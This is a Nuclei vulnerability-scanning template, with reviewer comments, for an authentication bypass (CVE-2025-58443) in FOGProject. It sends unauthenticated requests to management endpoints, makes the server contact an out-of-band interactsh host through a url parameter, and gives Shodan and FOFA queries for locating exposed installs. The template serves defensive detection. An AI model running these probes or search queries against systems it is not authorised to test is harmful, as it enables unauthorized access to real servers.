# Nuclei template: checks whether a FOGProject instance serves management
# and service endpoints to a client that presents no credentials
# (CVE-2025-58443, classified below as CWE-287).
id: CVE-2025-58443

info:
  name: FOGProject <= 1.5.10.1673 - Authentication Bypass
  author: oleveloper
  severity: critical
  description: |
    FOGProject version 1.5.10.1673 suffers from an authentication bypass vulnerability that allows unauthenticated users to access the management interface without proper authentication. This can lead to unauthorized access to system configuration, host management, and potentially database information.
  impact: |
    Unauthenticated attackers can bypass authentication to access the FOGProject management interface and retrieve sensitive system configuration and host management information.
  remediation: |
    Upgrade FOGProject to a version later than 1.5.10.1673 that implements proper authentication on all management endpoints.
  reference:
    - https://github.com/casp3r0x0/CVE-2025-58443
    - https://nvd.nist.gov/vuln/detail/CVE-2025-58443
  classification:
    # Vector: network-reachable, no privileges or user interaction required,
    # high confidentiality and integrity impact, no availability impact.
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:N
    cvss-score: 9.1
    cve-id: CVE-2025-58443
    epss-score: 0.09895
    epss-percentile: 0.9314
    cwe-id: CWE-287
  metadata:
    # 1 fingerprint request + 2 probe paths in the second request block.
    max-request: 3
    vendor: fogproject
    product: fogproject
    # Both search queries key on the same favicon hash.
    fofa-query: icon_hash="-1952619005"
    shodan-query: http.favicon.hash:-1952619005
  # NOTE(review): the second request uses {{interactsh-url}}, but no `oast`
  # tag is listed here; confirm against the repository's tagging convention
  # so out-of-band tag filters treat this template as expected.
  tags: cve,cve2025,fogproject,auth-bypass,vkev

# The probe request (http(2)) is only evaluated when the fingerprint
# request (http(1)) matched.
flow: http(1) && http(2)

http:
  # Request 1: fingerprint gate. Follows redirects from the base URL and
  # requires HTTP 200 plus the case-sensitive substring 'FOG' in the body.
  # `internal: true` keeps this match from being reported as a finding;
  # it only feeds the flow expression above.
  # NOTE(review): 'FOG' is a broad substring, so unrelated pages can pass
  # this gate; the decision to report rests on request 2.
  - method: GET
    path:
      - "{{BaseURL}}"

    redirects: true
    matchers:
      - type: dsl
        dsl:
          - "contains(body, 'FOG')"
          - "status_code == 200"
        condition: and
        internal: true

  # Request 2: two GETs with no cookie or auth header set by this template.
  # In web access logs these appear as session-less requests for
  # /fog/management/index.php?node=about&sub=kernel and
  # /fog/service/getversion.php?url=<external host>.
  # NOTE(review): both paths hard-code the /fog/ prefix; an install served
  # from a different web root would presumably not be detected - confirm.
  - method: GET
    path:
      - "{{BaseURL}}/fog/management/index.php?node=about&sub=kernel"
      - "{{BaseURL}}/fog/service/getversion.php?url={{interactsh-url}}"

    # Either matcher below is sufficient to report a finding.
    matchers-condition: or
    matchers:
      # Matcher A: HTTP 200 and a DNS interaction recorded for the
      # generated interactsh host (presumably because the server resolves
      # the host supplied in the `url` parameter - TODO confirm).
      # NOTE(review): a DNS lookup alone is indirect evidence; a proxy,
      # WAF or other inspection device that resolves hostnames seen in
      # URLs could also produce it. Verify findings that come only from
      # this matcher before treating the host as affected.
      - type: dsl
        dsl:
          - "status_code == 200"
          - "contains(interactsh_protocol,'dns')"
        condition: and

      # Matcher B: HTTP 200 and a body where 'FOG', then 'Configuration',
      # then 'Kernel' or 'bzImage' appear in that order. (?is) makes the
      # regex case-insensitive and lets '.' span newlines.
      - type: dsl
        dsl:
          - "status_code == 200"
          - "regex('(?is)FOG.*Configuration.*(?:Kernel|bzImage)', body)"
        condition: and
# NOTE(review): the digest below was presumably computed over the template
# as originally published; any edit to this file, comments included, likely
# invalidates it - re-sign before relying on signature verification.
# digest: 4a0a0047304502201fa18d4837b40b0cb6f477af9df79d09feb405af376f84e8739ad2d24865a91a022100a18cafe143974c0fa46018b403316b2c0948696fa4c3a5cd2d96f17f23e69b58:922c64590222798bb761d5b6d8e72950